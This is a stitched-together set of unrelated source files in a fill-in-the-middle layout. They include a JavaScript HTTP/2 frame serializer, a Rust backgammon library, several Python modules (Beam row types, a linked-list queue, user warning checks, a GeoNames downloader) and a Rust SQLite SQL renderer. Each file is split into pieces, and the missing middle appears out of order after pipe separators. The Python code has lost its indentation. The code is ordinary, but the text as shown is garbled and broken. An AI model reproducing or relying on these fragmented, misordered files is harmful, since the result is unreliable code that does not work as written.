// In addition to the frame header, PING frames MUST contain 8 additional octets of opaque data.
Serializer.PING = function writePing(frame, buffers) {
buffers.push(frame.data);
};
Deserializer.PING = function readPing(buffer, frame) {
if (buffer.length !== 8) {
return 'FRAME_SIZE_ERROR';
}
frame.data = buffer;
};
// [GOAWAY](https://tools.ietf.org/html/rfc7540#section-6.8)
// ---------------------------------------------------
//
// The GOAWAY frame (type=0x7) informs the remote peer to stop creating streams on this connection.
//
// The GOAWAY frame does not define any flags.
frameTypes[0x7] = 'GOAWAY';
frameFlags.GOAWAY = [];
typeSpecificAttributes.GOAWAY = ['last_stream', 'error'];
// 0 1 2 3
// 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
// +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
// |X| Last-Stream-ID (31) |
// +-+-------------------------------------------------------------+
// | Error Code (32) |
// +---------------------------------------------------------------+
// | Additional Debug Data (*) |
// +---------------------------------------------------------------+
//
// The last stream identifier in the GOAWAY frame contains the highest numbered stream identifier
// for which the sender of the GOAWAY frame has received frames on and might have taken some action
// on.
//
// The GOAWAY frame also contains a 32-bit error code (see Error Codes) that contains the reason for
// closing the connection.
Serializer.GOAWAY = function writeGoaway(frame, buffers) {
var buffer = new Buffer(8);
var last_stream = frame.last_stream;
assert((0 <= last_stream) && (last_stream <= 0x7fffffff), last_stream);
buffer.writeUInt32BE(last_stream, 0);
var code = errorCodes.indexOf(frame.error);
assert((0 <= code) && (code <= 0xffffffff), code);
buffer.writeUInt32BE(code, 4);
buffers.push(buffer);
};
Deserializer.GOAWAY = function readGoaway(buffer, frame) {
if (buffer.length < 8) {
// GOAWAY must have at least 8 bytes
return 'FRAME_SIZE_ERROR';
}
frame.last_stream = buffer.readUInt32BE(0) & 0x7fffffff;
frame.error = errorCodes[buffer.readUInt32BE(4)];
if (!frame.error) {
// Unknown error types are to be considered equivalent to INTERNAL ERROR
frame.error = 'INTERNAL_ERROR';
}
// Read remaining data into "debug_data"
// https://http2.github.io/http2-spec/#GOAWAY
// Endpoints MAY append opaque data to the payload of any GOAWAY frame
if (buffer.length > 8) {
frame.debug_data = buffer.slice(8);
}
};
// [WINDOW_UPDATE](https://tools.ietf.org/html/rfc7540#section-6.9)
// -----------------------------------------------------------------
//
// The WINDOW_UPDATE frame (type=0x8) is used to implement flow control.
//
// The WINDOW_UPDATE frame does not define any flags.
frameTypes[0x8] = 'WINDOW_UPDATE';
frameFlags.WINDOW_UPDATE = [];
typeSpecificAttributes.WINDOW_UPDATE = ['window_size'];
// The payload of a WINDOW_UPDATE frame is a 32-bit value indicating the additional number of bytes
// that the sender can transmit in addition to the existing flow control window. The legal range
// for this field is 1 to 2^31 - 1 (0x7fffffff) bytes; the most significant bit of this value is
// reserved.
Serializer.WINDOW_UPDATE = function writeWindowUpdate(frame, buffers) {
var buffer = new Buffer(4);
var window_size = frame.window_size;
assert((0 < window_size) && (window_size <= 0x7fffffff), window_size);
buffer.writeUInt32BE(window_size, 0);
buffers.push(buffer);
};
Deserializer.WINDOW_UPDATE = function readWindowUpdate(buffer, frame) {
if (buffer.length !== WINDOW_UPDATE_PAYLOAD_SIZE) {
return 'FRAME_SIZE_ERROR';
}
frame.window_size = buffer.readUInt32BE(0) & 0x7fffffff;
if (frame.window_size === 0) {
return 'PROTOCOL_ERROR';
}
};
// [CONTINUATION](https://tools.ietf.org/html/rfc7540#section-6.10)
// ------------------------------------------------------------
//
// The CONTINUATION frame (type=0x9) is used to continue a sequence of header block fragments.
//
// The CONTINUATION frame defines the following flag:
//
// * END_HEADERS (0x4):
// The END_HEADERS bit indicates that this frame ends the sequence of header block fragments
// necessary to provide a complete set of headers.
frameTypes[0x9] = 'CONTINUATION';
frameFlags.CONTINUATION = ['RESERVED1', 'RESERVED2', 'END_HEADERS'];
typeSpecificAttributes.CONTINUATION = ['headers', 'data'];
Serializer.CONTINUATION = function writeContinuation(frame, buffers) {
buffers.push(frame.data);
};
Deserializer.CONTINUATION = function readContinuation(buffer, frame) {
frame.data = buffer;
};
// [ALTSVC](https://tools.ietf.org/html/rfc7838#section-4)
// ------------------------------------------------------------
//
// The ALTSVC frame (type=0xA) advertises the availability of an alternative service to the client.
//
// The ALTSVC frame does not define any flags.
frameTypes[0xA] = 'ALTSVC';
frameFlags.ALTSVC = [];
// 0 1 2 3
// 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
// +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
// | Origin-Len (16) | Origin? (*) ...
// +-------------------------------+----------------+--------------+
// | Alt-Svc-Field-Value (*) ...
// +---------------------------------------------------------------+
//
// The ALTSVC frame contains the following fields:
//
// Origin-Len: An unsigned, 16-bit integer indicating the length, in
// octets, of the Origin field.
//
// Origin: An OPTIONAL sequence of characters containing ASCII
// serialisation of an origin ([RFC6454](https://tools.ietf.org/html/rfc6454),
// Section 6.2) that the alternate service is applicable to.
//
// Alt-Svc-Field-Value: A sequence of octets (length determined by
// subtracting the length of all preceding fields from the frame
// length) containing a value identical to the Alt-Svc field value
// defined in (Section 3)[https://tools.ietf.org/html/rfc7838#section-3]
// (ABNF production "Alt-Svc").
typeSpecificAttributes.ALTSVC = ['maxAge', 'port', 'protocolID', 'host',
'origin'];
function istchar(c) {
return ('!#$&\'*+-.^_`|~1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'.indexOf(c) > -1);
}
function | (s) {
var t = '';
for (var i = 0; i < s.length; i++) {
if (!istchar(s[i])) {
t += '%';
t += new Buffer(s[i]).toString('hex');
} else {
t += s[i];
}
}
return t;
}
Serializer.ALTSVC = function writeAltSvc(frame, buffers) {
var buffer = new Buffer(2);
buffer.writeUInt16BE(frame.origin.length, 0);
buffers.push(buffer);
buffers.push(new Buffer(frame.origin, 'ascii'));
var fieldValue = hexencode(frame.protocolID) + '="' + frame.host + ':' + frame.port + '"';
if (frame.maxAge !== 86400) { // 86400 is the default
fieldValue += "; ma=" + frame.maxAge;
}
buffers.push(new Buffer(fieldValue, 'ascii'));
};
function stripquotes(s) {
var start = 0;
var end = s.length;
while ((start < end) && (s[start] === '"')) {
start++;
}
while ((end > start) && (s[end - 1] === '"')) {
end--;
}
if (start >= end) {
return "";
}
return s.substring(start, end);
}
function splitNameValue(nvpair) {
var eq = -1;
var inQuotes = false;
for (var i = 0; i < nvpair.length; i++) {
if (nvpair[i] === '"') {
inQuotes = !inQuotes;
continue;
}
if (inQuotes) {
continue;
}
if (nvpair[i] === '=') {
eq = i;
break;
}
}
if (eq === -1) {
return {'name': nvpair, 'value': null};
}
var name = stripquotes(nvpair.substring(0, eq).trim());
var value = stripquotes(nvpair.substring(eq + 1).trim());
return {'name': name, 'value': value};
}
function splitHeaderParameters(hv) {
return parseHeaderValue(hv, ';', splitNameValue);
}
function parseHeaderValue(hv, separator, callback) {
var start = 0;
var inQuotes = false;
var values = [];
for (var i = 0; i < hv.length; i++) {
if (hv[i] === '"') {
inQuotes = !inQuotes;
continue;
}
if (inQuotes) {
// Just skip this
continue;
}
if (hv[i] === separator) {
var newValue = hv.substring(start, i).trim();
if (newValue.length > 0) {
newValue = callback(newValue);
values.push(newValue);
}
start = i + 1;
}
}
var newValue = hv.substring(start).trim();
if (newValue.length > 0) {
newValue = callback(newValue);
values.push(newValue);
}
return values;
}
function rsplit(s, delim, count) {
var nsplits = 0;
var end = s.length;
var rval = [];
for (var i = s.length - 1; i >= 0; i--) {
if (s[i] === delim) {
var t = s.substring(i + 1, end);
end = i;
rval.unshift(t);
nsplits++;
if (nsplits === count) {
break;
}
}
}
if (end !== 0) {
rval.unshift(s.substring(0, end));
}
return rval;
}
function ishex(c) {
return ('0123456789ABCDEFabcdef'.indexOf(c) > -1);
}
function unescape(s) {
var i = 0;
var t = '';
while (i < s.length) {
if (s[i] != '%' || !ishex(s[i + 1]) || !ishex(s[i + 2])) {
t += s[i];
} else {
++i;
var hexvalue = '';
if (i < s.length) {
hexvalue += s[i];
++i;
}
if (i < s.length) {
hexvalue += s[i];
}
if (hexvalue.length > 0) {
t += new Buffer(hexvalue, 'hex').toString();
} else {
t += '%';
}
}
++i;
}
return t;
}
Deserializer.ALTSVC = function readAltSvc(buffer, frame) {
if (buffer.length < 2) {
return 'FRAME_SIZE_ERROR';
}
var originLength = buffer.readUInt16BE(0);
if ((buffer.length - 2) < originLength) {
return 'FRAME_SIZE_ERROR';
}
frame.origin = buffer.toString('ascii', 2, 2 + originLength);
var fieldValue = buffer.toString('ascii', 2 + originLength);
var values = parseHeaderValue(fieldValue, ',', splitHeaderParameters);
if (values.length > 1) {
// TODO - warn that we only use one here
}
if (values.length === 0) {
// Well that's a malformed frame. Just ignore it.
return;
}
var chosenAltSvc = values[0];
frame.maxAge = 86400; // Default
for (var i = 0; i < chosenAltSvc.length; i++) {
if (i === 0) {
// This corresponds to the protocolID="<host>:<port>" item
frame.protocolID = unescape(chosenAltSvc[i].name);
var hostport = rsplit(chosenAltSvc[i].value, ':', 1);
frame.host = hostport[0];
frame.port = parseInt(hostport[1], 10);
} else if (chosenAltSvc[i].name == 'ma') {
frame.maxAge = parseInt(chosenAltSvc[i].value, 10);
}
// Otherwise, we just ignore this
}
};
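// Example (editor's addition, with a hypothetical host name): an Alt-Svc-Field-Value of
//   h2="alt.example.com:443"; ma=2592000
// parses to protocolID 'h2', host 'alt.example.com', port 443 and maxAge 2592000;
// a value without an 'ma' parameter keeps the 86400-second default set above.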
// BLOCKED
// ------------------------------------------------------------
//
// The BLOCKED frame (type=0xB) indicates that the sender is unable to send data
// due to a closed flow control window.
//
// The BLOCKED frame does not define any flags and contains no payload.
frameTypes[0xB] = 'BLOCKED';
frameFlags.BLOCKED = [];
typeSpecificAttributes.BLOCKED = [];
Serializer.BLOCKED = function writeBlocked(frame, buffers) {
};
Deserializer.BLOCKED = function readBlocked(buffer, frame) {
};
// [Error Codes](https://tools.ietf.org/html/rfc7540#section-7)
// ------------------------------------------------------------
var errorCodes = [
'NO_ERROR',
'PROTOCOL_ERROR',
'INTERNAL_ERROR',
'FLOW_CONTROL_ERROR',
'SETTINGS_TIMEOUT',
'STREAM_CLOSED',
'FRAME_SIZE_ERROR',
'REFUSED_STREAM',
'CANCEL',
'COMPRESSION_ERROR',
'CONNECT_ERROR',
'ENHANCE_YOUR_CALM',
'INADEQUATE_SECURITY',
'HTTP_1_1_REQUIRED'
];
// Logging
// -------
// [Bunyan serializers](https://github.com/trentm/node-bunyan#serializers) to improve logging output
// for debug messages emitted in this component.
exports.serializers = {};
// * `frame` serializer: it transforms data attributes from Buffers to hex strings and filters out
// flags that are not present.
var frameCounter = 0;
exports.serializers.frame = function(frame) {
if (!frame) {
return null;
}
if ('id' in frame) {
return frame.id;
}
frame.id = frameCounter;
frameCounter += 1;
var logEntry = { id: frame.id };
genericAttributes.concat(typeSpecificAttributes[frame.type]).forEach(function(name) {
logEntry[name] = frame[name];
});
if (frame.data instanceof Buffer) {
if (logEntry.data.length > 50) {
logEntry.data = frame.data.slice(0, 47).toString('hex') + '...';
} else {
logEntry.data = frame.data.toString('hex');
}
if (!('length' in logEntry)) {
logEntry.length = frame.data.length;
}
}
if (frame.promised_stream instanceof Object) {
logEntry.promised_stream = 'stream-' + frame.promised_stream.id;
}
logEntry.flags = Object.keys(frame.flags || {}).filter(function(name) {
return frame.flags[name] === true;
});
return logEntry;
};
// * `data` serializer: it simply transforms a buffer to a hex string.
exports.serializers.data = function(data) {
return data.toString('hex');
};
| hexencode |
lib.rs | //! # Backgammon: The Oldest Board Game of the World
//! This crate provides a pure, canonical implementation of the game
//! [*Backgammon*](https://en.wikipedia.org/wiki/Backgammon). It allows to
//! implement fast Backgammon games in various clients.
//!
//! ## Supported Doubling Cube Rules
//! This library supports the following rules on the doubling cube:
//!
//! * Beaver
//! * Raccoon
//! * Murphy
//! * Jacoby
//! * Crawford
//! * Holland
//!
//! ## Example
//! Start a new match with rules:
//! ```
//! use backgammon::{Match,Rules};
//!
//! let mut m = Match::new().
//! with_points(13).
//! with_jacoby();
//!
//! ```
//!
//! ## Discussions and Support
//! Any support is very welcome. Please use [Bitbucket
//! Issues](https://bitbucket.org/carlostrub/backgammon/issues?status=new&status=open) to discuss
//! features or ask for help.
//!
//! ## Source Code Integrity
//! All commits are signed with the following GPG key (find the respective key for example in the
//! [FreeBSD keyring](https://docs.freebsd.org/pgpkeys/pgpkeys.txt)):
//!
//! `59A6 2B5D B2FE B9CA 2358 4FA1 1C7A 2F39 D966 052B`
//!
//! You can verify the integrity of the code by running:
//!
//! `git log --show-signature`
#![warn(future_incompatible)]
#![deny(
missing_docs,
unused_variables,
missing_debug_implementations,
single_use_lifetimes,
trivial_casts,
trivial_numeric_casts,
unreachable_pub,
unsafe_code,
unused_extern_crates,
unused_import_braces,
unused_qualifications,
unused_results,
variant_size_differences
)] // be tough on code quality
use std::fmt;
use std::time::SystemTime;
use uuid::Uuid;
/// Represents a Backgammon match
#[derive(Debug)]
pub struct Match {
id: Uuid,
points: u32,
rules: CurrentRules,
games: Vec<Game>,
statistics: Statistics,
}
/// Holds the rules of the match
#[derive(Debug)]
struct CurrentRules {
/// When offered the cube, allow to re-double but keep it.
beaver: bool,
/// If a player plays "beaver", the other may double again, letting the opponent keep the cube.
raccoon: bool,
/// If both players roll the same opening number, the stake is automatically doubled and the cube
/// remains in the middle of the board
murphy: bool,
/// How often to apply automatic doubling rule. 0 means always on.
murphy_limit: u8,
/// Gammon and Backgammon only count for double or triple values if the cube has already been
/// offered.
jacoby: bool,
/// When a player first reaches a score of points - 1, no doubling is allowed for the following
/// game.
crawford: bool,
/// Permits to double after Crawford game only if both players have rolled at least twice
holland: bool,
}
/// Holds various statistical information about a Match or a Game
#[derive(Debug, Clone, Copy)]
struct Statistics {
/// start time
time_start: SystemTime,
/// End time
time_end: SystemTime,
}
/// Implements the Backgammon rules
pub trait Rules {
/// When offered the cube, allow to re-double but keep it.
fn with_beaver(self) -> Self;
/// Return true if beaver rule is set
fn is_beaver(&self) -> bool;
/// If a player plays "beaver", the other may double again, letting the opponent keep the cube.
fn with_raccoon(self) -> Self;
/// Return true if Raccoon rule is set
fn is_raccoon(&self) -> bool;
/// If both players roll the same opening number, the stake is automatically doubled and the cube
/// remains in the middle of the board
fn with_murphy(self, limit: u8) -> Self;
/// Return true if Murphy rule is set
fn is_murphy(&self) -> bool;
/// Gammon and Backgammon only count for double or triple values if the cube has already been
/// offered.
fn with_jacoby(self) -> Self;
/// Return true if Jacoby rule is set
fn is_jacoby(&self) -> bool;
/// When a player first reaches a score of points - 1, no doubling is allowed for the following
/// game.
fn with_crawford(self) -> Self;
/// Return true if Crawford rule is set
fn is_crawford(&self) -> bool;
/// Permits to double after Crawford game only if both players have rolled at least twice
fn with_holland(self) -> Self;
/// Return true if Holland rule is set
fn is_holland(&self) -> bool;
}
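// Editor's sketch (not part of the crate docs): the trait is builder-style, so, assuming
// `Match` implements `Rules` as the module layout below suggests, several cube rules can
// be enabled in one chain, mirroring the crate-level example:
//
// let m = Match::new()
//     .with_points(7)
//     .with_beaver()
//     .with_crawford();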
/// Backgammon defines certain errors
#[derive(Debug)]
pub enum Error {
/// Game has already started
StartedError,
/// Game has already ended
EndedError,
/// Opponent is playing
TurnError,
/// Opponent offered dice. Need to react on this event first.
DiceReceivedError,
/// Doubling not permitted
DoubleError,
}
impl std::error::Error for Error {}
impl fmt::Display for Error {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
match self {
Error::StartedError => write!(f, "Game has already started"),
Error::EndedError => write!(f, "Game has already ended"),
Error::TurnError => write!(f, "Opponent is playing"),
Error::DiceReceivedError => {
write!(
f,
"Opponent offered dice. Need to react on this event first."
)
}
Error::DoubleError => write!(f, "Doubling not permitted"),
}
}
}
/// This enum is used in several places, e.g. for cube ownership or for winner
#[derive(Debug, PartialEq, Clone, Copy)]
pub enum Player {
/// none of the two players, e.g. at start
Nobody,
/// Player 1
Player1,
/// Player 2
Player2,
}
/// Represents a Backgammon game
#[derive(Debug, Clone, Copy)]
pub struct Game {
/// how many points in the game?
pub points: u32,
/// who is the winner?
pub winner: Player,
/// last dice pair rolled
pub dices: (u8, u8),
/// whose turn is it?
pub who_plays: Player,
/// a board has 24 fields, the second tuple is the bar for Player 1 and 2, the third tuple is
/// the off for Player 1 and 2
pub board: ([i8; 24], (u8, u8), (u8, u8)),
/// cube displays the n-th power of 2, e.g. 2 -> 2^2 = 4
pub cube: u8,
/// who holds the cube
pub cube_owner: Player,
/// was cube offered to the one who plays?
pub cube_received: bool,
// Crawford rule: if crawford game, no doubling allowed
crawford: bool,
// Holland rule: if <4 rolls of crawford game, no doubling allowed
since_crawford: u8,
// Gather statistical information
statistics: Statistics,
}
/// Implements a Backgammon game
mod bg_game;
/// Implements a Backgammon match
mod bg_match;
/// Implements all Backgammon rules
mod bg_rules;
/// Implements certain Backgammon statistics
mod bg_statistics;
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn | () {
let m = Match::new().with_jacoby();
assert_eq!(
format!("The match rules are: {:?}", m.rules),
"The match rules are: CurrentRules { beaver: false, raccoon: false, murphy: false, murphy_limit: 0, jacoby: true, crawford: true, holland: false }"
);
}
#[test]
fn debug_current_rules() {
let r = CurrentRules::default().with_jacoby();
assert_eq!(
format!("The match rules are: {:?}", r),
"The match rules are: CurrentRules { beaver: false, raccoon: false, murphy: false, murphy_limit: 0, jacoby: true, crawford: true, holland: false }"
);
}
#[test]
fn debug_cubeowner() {
let o = Player::Nobody;
assert_eq!(
format!("The cube is owned by: {:?}", o),
"The cube is owned by: Nobody"
);
}
#[test]
fn debug_game() {
let g = Game::default();
let g_beginning = format!("{:?}", g);
assert_eq!(
g_beginning.get(0..16).unwrap(),
String::from("Game { points: 0")
);
}
}
| debug_match |
instruction.rs | use crate::tools::file_handler::split_with_expression;
#[derive(Clone, Debug)]
pub struct | {
pub command: String,
pub number: isize,
}
impl From<String> for Instruction {
fn from(s: String) -> Self {
let v = split_with_expression(&s, " ").expect("Unable to split");
let command: String = v[0].clone();
let number: isize = v[1].parse().unwrap();
Instruction {
command,
number
}
}
} | Instruction |
row_type.py | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# pytype: skip-file
from apache_beam.typehints import typehints
class RowTypeConstraint(typehints.TypeConstraint):
def __init__(self, fields):
self._fields = tuple(fields)
def _consistent_with_check_(self, sub):
return self == sub
def type_check(self, instance):
|
def _inner_types(self):
"""Iterates over the inner types of the composite type."""
return [field[1] for field in self._fields]
def __eq__(self, other):
return type(self) == type(other) and self._fields == other._fields
def __hash__(self):
return hash(self._fields)
def __repr__(self):
return 'Row(%s)' % ', '.join(
'%s=%s' % (name, typehints._unified_repr(t)) for name,
t in self._fields)
def get_type_for(self, name):
return dict(self._fields)[name]
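# Editor's sketch (not part of the original file): `fields` is a sequence of
# (name, type) pairs, e.g.
#   row_type = RowTypeConstraint([('id', int), ('name', str)])
#   row_type.get_type_for('id')  # -> int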
| from apache_beam import Row
return isinstance(instance, Row) |
ProfileViewContainer.js | import {connect} from 'react-redux';
import ProfileView from './ProfileView';
export default connect(
state => {
return { | projects: state.get('projects')
};
}
)(ProfileView); | username: state.get('username'),
description: state.get('description'),
hours: state.get('hours'), |
queue_link_list.py | import sys, os
sys.path.append(os.path.abspath(os.path.join('..', 'linked_list')))
from LinkedList import linked_list
from node import Node
class queue_linked_list():
def __init__(self):
self.head = None
self.tail = None
def enqueue(self, value):
tempNode = Node(value)
if (self.tail):
self.tail.set_next(tempNode)
self.tail = tempNode
else:
self.head = tempNode
self.tail = tempNode
def dequeue(self):
if (self.empty() == False):
tempHeadNext = self.head.get_next()
result = self.head
if (tempHeadNext == None):
self.tail = None
else: | return "The queue is empty"
def empty(self):
if (self.head):
return False
else:
return True
def __str__(self):
current = self.head
output = ""
while current:
output += str(current) + " -> "
current = current.get_next()
output += " End "
return output | self.head = tempHeadNext
else: |
warnings.py | import datetime
import inspect
class Warnings:
def __init__(self, config, user_data):
self._config = config
self._user_data = user_data
def _get_warnings(warnings_instance):
"""
returns a list of the returned value of
all private functions of warnings_instance
"""
# all functions of this class
warning_functions = inspect.getmembers(
warnings_instance.__class__, predicate=inspect.isfunction
)
# all private functions of this class, with the
# exclusion of __init__
warning_functions = [
wf
for wf in warning_functions
if not wf[0].startswith("__") and wf[0].startswith("_")
]
warnings = []
for _, function in warning_functions:
warnings.append(function(warnings_instance))
return [str(w) for w in warnings if w is not None]
class CoreWarnings(Warnings):
"""
Warnings for all users (alumni or not)
"""
def __init__(self, config, user_data):
super().__init__(config, user_data)
expiration = self._user_data["expiration"]
date = datetime.date(expiration.year, expiration.month, expiration.day)
now = datetime.datetime.now()
now = datetime.date(now.year, now.month, now.day)
self._expired = (date - now).days < 0  # expired when the expiration date lies in the past
def _not_set_as_alumni(self):
if self._expired and not self._user_data["contract"] == "alumni":
return str("contract expired but not set " "alumni")
return None
def get(self):
"""
returns the list of warnings of the user
"""
return _get_warnings(self)
class ActiveWarnings(Warnings):
"""
Warnings for "active" user (i.e. not alumni)
"""
def __init__(self, config, user_data):
super().__init__(config, user_data)
def _attribute_not_set(self, attr):
user_value = self._user_data[attr]
if user_value is None:
return "{} is not set".format(attr)
if user_value == "false":
return "{} is not set".format(attr)
return None
def _firstname_not_set(self):
return self._attribute_not_set("firstname")
| return self._attribute_not_set("lastname")
def _ldap_not_set(self):
return self._attribute_not_set("ldap")
def _forms_status(self):
forms_sent = self._attribute_not_set("forms_sent")
if forms_sent is not None:
return forms_sent
forms_received = self._attribute_not_set("forms_received")
if forms_received is not None:
return forms_received
is_website = self._attribute_not_set("is_website")
return is_website
def _expiration_not_set(self):
return self._attribute_not_set("expiration")
def _contract_not_set(self):
return self._attribute_not_set("contract")
def _type_not_set(self):
return self._attribute_not_set("type")
def get(self):
"""
returns the list of warnings of the user
"""
# this execute all private functions of
# this class, each returning either None
# (no warning) or a string (warning message)
if self._user_data["contract"] == "alumni":
return []
return _get_warnings(self)
class TransitionWarnings(Warnings):
"""
Warnings for active users for which
the contract will soon expire
"""
def __init__(self, config, user_data, threshold_days=10):
super().__init__(config, user_data)
 expiration = self._user_data["expiration"]
date = datetime.date(expiration.year, expiration.month, expiration.day)
now = datetime.datetime.now()
now = datetime.date(now.year, now.month, now.day)
self._expire_in = (date - now).days
self._threshold_days = threshold_days
def _no_closure_mail(self):
 if not self._user_data["closure_mail"]:
return str(
"contract expires soon, " "but no closure contract has been sent"
)
return None
def get(self):
"""
returns the list of warnings of the user
"""
 if self._expire_in > self._threshold_days:
return []
return _get_warnings(self)
class AlumniWarnings(Warnings):
"""
Warnings for "inactive" user (i.e alumni)
"""
def __init__(self, config, user_data):
super().__init__(config, user_data)
def _not_vaulted(self):
if not self._user_data["vaulted"]:
return "user is not (ldap) vaulted"
return None
def _no_forwarder(self):
if not self._user_data["forwarder"]:
return str("user email has not been replaced " "by a forwarder")
return None
def _not_set_as_alumni(self):
if not self._user_data["website_alumni"]:
return str("user not set as alumni " "in the website")
return None
def _has_hardware(self):
if self._user_data["hardware"]:
return str("user still has some" "hardware")
return None
def _has_licenses(self):
if self._user_data["licenses"]:
return str("user still has some" "licenses")
return None
def _assets_in_is_snipe(self):
if not self._user_data["is_snipe_cleared"]:
return str("user may still have some " "assets deployed to in is-snipe")
def get(self):
"""
returns the list of warnings of the user
"""
if not self._user_data["contract"] == "alumni":
return []
return _get_warnings(self)
 def all_warnings(config, user_data):
"""
returns the list of warnings (str)
of the user
"""
warnings_classes = list(Warnings.__subclasses__())
 instances = [wc(config, user_data) for wc in warnings_classes]
warnings = []
for instance in instances:
warnings.extend(instance.get())
return warnings | def _lastname_not_set(self): |
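A standalone sketch of the introspection pattern _get_warnings relies on (the names below are illustrative, not taken from the project): collect the non-None return values of every single-underscore method of an instance.
import inspect

class _ExampleChecks:
    def _missing_name(self):
        return "name is not set"
    def _ok(self):
        return None  # no warning

def _collect(instance):
    # all functions defined on the class, keeping only "_private" ones (not dunders)
    functions = inspect.getmembers(instance.__class__, predicate=inspect.isfunction)
    functions = [f for name, f in functions
                 if name.startswith("_") and not name.startswith("__")]
    return [str(w) for w in (f(instance) for f in functions) if w is not None]

print(_collect(_ExampleChecks()))  # ['name is not set']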
country.py | #!/usr/bin/python3
from __future__ import annotations
from typing import Dict
from requests import get
from json import dumps
from os.path import join, abspath, dirname, exists, realpath
from os import mkdir
def build(target_file: str = abspath(join(dirname(realpath(__file__)), '../data/country.json'))) -> Dict[str, str]:
|
if __name__ == '__main__':
try:
print(build())
except KeyboardInterrupt:
print('\n[!]Terminated :/')
finally:
exit(0)
| '''
Builds country info dataset.
 First it fetches data from the GeoNames data dump site, then processes the text data and converts it to JSON. Finally it stores the result in the provided file `/data/country.json`.
 On success returns
`{'success': 'true'}`
else
`{'error': ' ... '}`
'''
code = {'error': 'incomplete'}
try:
if(not exists(dirname(target_file))):
 # create the target data directory if it doesn't exist already
mkdir(dirname(target_file))
with open(target_file, mode='w') as fd:
fd.write(dumps(
{
'countries': [{'iso': country[0], 'iso3': country[1], 'isoNumeric': country[2], 'fips': country[3], 'country': country[4], 'capital': country[5], 'area(in sq km)': country[6], 'population': country[7], 'continent': country[8], 'tld': country[9], 'currencyCode': country[10], 'currencyName': country[11], 'phone': country[12], 'postalFormat': country[13], 'postalRegex': country[14], 'languages': country[15].split(','), 'geonameid': country[16], 'neighbours': country[17].split(','), 'equivalentFips': country[18]} for country in (line.split('\t') for line in get(
'http://download.geonames.org/export/dump/countryInfo.txt').text.split('\n') if(line and (not line.startswith('#'))))]
}, indent=4, ensure_ascii=False))
code = {'success': 'true'}
except Exception as e:
code = {'error': str(e)}
return code |
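For illustration, one entry in the generated "countries" list has roughly this shape (the values below are examples, not copied from the GeoNames dump; the real record also carries tld, currencyCode, population and the other fields listed above):
example_entry = {
    "iso": "FI", "iso3": "FIN", "isoNumeric": "246", "fips": "FI",
    "country": "Finland", "capital": "Helsinki",
    "languages": ["fi-FI", "sv-FI"],
    "neighbours": ["NO", "RU", "SE"],
}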
0005_recipe_image.py | # Generated by Django 2.2.14 on 2020-07-31 14:42
import core.models
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0004_recipe'),
]
operations = [
migrations.AddField(
model_name='recipe',
name='image',
field=models.ImageField(null=True, upload_to=core.models.recipe_image_file_path), | ),
] |
|
solution.py | # https://leetcode.com/problems/contains-duplicate
class Solution:
def containsDuplicate(self, nums):
hs = set()
for num in nums: | hs.add(num)
return len(hs) != len(nums) |
|
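A quick check of the set-based duplicate test above (assuming the Solution class as defined):
print(Solution().containsDuplicate([1, 2, 3, 1]))  # True
print(Solution().containsDuplicate([1, 2, 3]))     # False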
test_solo.py | from __future__ import absolute_import
import operator
from celery.concurrency import solo
from celery.utils.functional import noop
from celery.tests.case import AppCase
class test_solo_TaskPool(AppCase):
def | (self):
x = solo.TaskPool()
x.on_start()
def test_on_apply(self):
x = solo.TaskPool()
x.on_start()
x.on_apply(operator.add, (2, 2), {}, noop, noop)
def test_info(self):
x = solo.TaskPool()
x.on_start()
self.assertTrue(x.info)
| test_on_start |
sqlite_renderer.rs | use super::common::*;
use crate::{sql_schema_helpers::*, SqlFamily};
use once_cell::sync::Lazy;
use prisma_models::PrismaValue;
use regex::Regex;
use sql_schema_describer::*;
use std::borrow::Cow;
pub struct SqliteRenderer;
impl super::SqlRenderer for SqliteRenderer {
fn sql_family(&self) -> SqlFamily {
SqlFamily::Sqlite
}
fn quote<'a>(&self, name: &'a str) -> Quoted<&'a str> {
Quoted::Double(name)
}
fn render_column(&self, _schema_name: &str, column: ColumnRef<'_>, _add_fk_prefix: bool) -> String {
let column_name = self.quote(column.name());
let tpe_str = self.render_column_type(column.column_type());
let nullability_str = render_nullability(&column);
let default_str = column
.default()
.map(|default| format!("DEFAULT {}", self.render_default(default, &column.column.tpe.family)))
.unwrap_or_else(String::new);
let auto_increment_str = if column.auto_increment() {
"PRIMARY KEY AUTOINCREMENT"
} else {
""
};
format!(
"{} {} {} {} {}",
column_name, tpe_str, nullability_str, default_str, auto_increment_str
)
}
fn render_references(&self, _schema_name: &str, foreign_key: &ForeignKey) -> String {
let referenced_fields = foreign_key
.referenced_columns
.iter()
.map(Quoted::sqlite_ident)
.join(",");
format!(
"REFERENCES {referenced_table}({referenced_fields}) {on_delete_action} ON UPDATE CASCADE",
referenced_table = self.quote(&foreign_key.referenced_table),
referenced_fields = referenced_fields,
on_delete_action = render_on_delete(&foreign_key.on_delete_action)
)
}
fn | <'a>(&self, default: &'a DefaultValue, family: &ColumnTypeFamily) -> Cow<'a, str> {
match (default, family) {
(DefaultValue::DBGENERATED(val), _) => val.as_str().into(),
(DefaultValue::VALUE(PrismaValue::String(val)), ColumnTypeFamily::String)
| (DefaultValue::VALUE(PrismaValue::Enum(val)), ColumnTypeFamily::Enum(_)) => {
format!("'{}'", escape_quotes(&val)).into()
}
(DefaultValue::NOW, ColumnTypeFamily::DateTime) => "CURRENT_TIMESTAMP".into(),
